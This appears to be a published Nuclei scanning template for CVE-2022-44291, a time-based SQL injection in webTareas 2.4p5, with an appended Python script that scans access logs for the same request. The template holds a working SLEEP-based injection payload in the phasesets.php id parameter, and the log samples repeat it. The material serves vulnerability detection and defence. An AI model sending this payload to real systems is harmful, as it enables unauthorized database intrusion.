WebTareas 2.4p5 - SQL Injection
ID: CVE-2022-44291
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project
Description
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
YAML Source
id: CVE-2022-44291

info:
  name: WebTareas 2.4p5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
  reference:
    - http://webtareas.com/
    - https://github.com/anhdq201/webtareas/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44291
    - http://webtareas.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44291
    cwe-id: CWE-89
    epss-score: 0.01336
    epss-percentile: 0.8578
    cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: webtareas_project
    product: webtareas
  tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project

http:
  - raw:
      - |
        POST /general/login.php?session=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525

        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="action"

        login
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginForm"

        {{username}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="passwordForm"

        {{password}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginSubmit"

        Log In
        -----------------------------3023071625140724693672385525--
      - |
        @timeout: 20s
        GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'len(body_2) == 0'
          - 'status_code_2 == 302'
          - 'contains(header_2, "text/html")'
          - 'contains(body_1, "webTareasSID")'
        condition: and
# digest: 4a0a00473045022100a5b44d4113406a37d4dc9ffaab3ac099fd88c8df29fc73a9faac421783cfca5b02207f3dc0b0107ecbb5318d9b12e4f315408b4ca5e85ae7b913be4c5db47c00b47a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-44291.yaml"
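An added example, not part of the template or of webTareas: a passive check over existing web server access logs that flags any request to phasesets.php whose id parameter is not a plain decimal integer, which is the shape of the request the template sends. The combined log format, the sample log lines and the assumption that legitimate id values are plain integers belong to this example, not to the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter name come from the template; the log format is an assumption.
TARGET_PATH = "/administration/phasesets.php"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /administration/phasesets.php?mode=delete&id=7 HTTP/1.1" 302 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] '
    '"GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+'
    '(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1" 302 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /general/home.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /webtareas/administration/phasesets.php?id=2%27&mode=delete HTTP/1.1" 302 0',
]


def suspicious_ids(log_lines):
    """Return (line_number, decoded id value) for every phasesets.php request
    whose id parameter is anything other than a plain decimal integer."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group("target"))
        # endswith() also covers installs below a sub-directory.
        if not url.path.lower().endswith(TARGET_PATH):
            continue
        # parse_qs percent-decodes values and turns '+' into a space;
        # keep_blank_values makes an empty id= show up as well.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((line_no, value))
    return hits


if __name__ == "__main__":
    for line_no, value in suspicious_ids(SAMPLE_LOG):
        print(f"line {line_no}: non-numeric id={value!r}")
```
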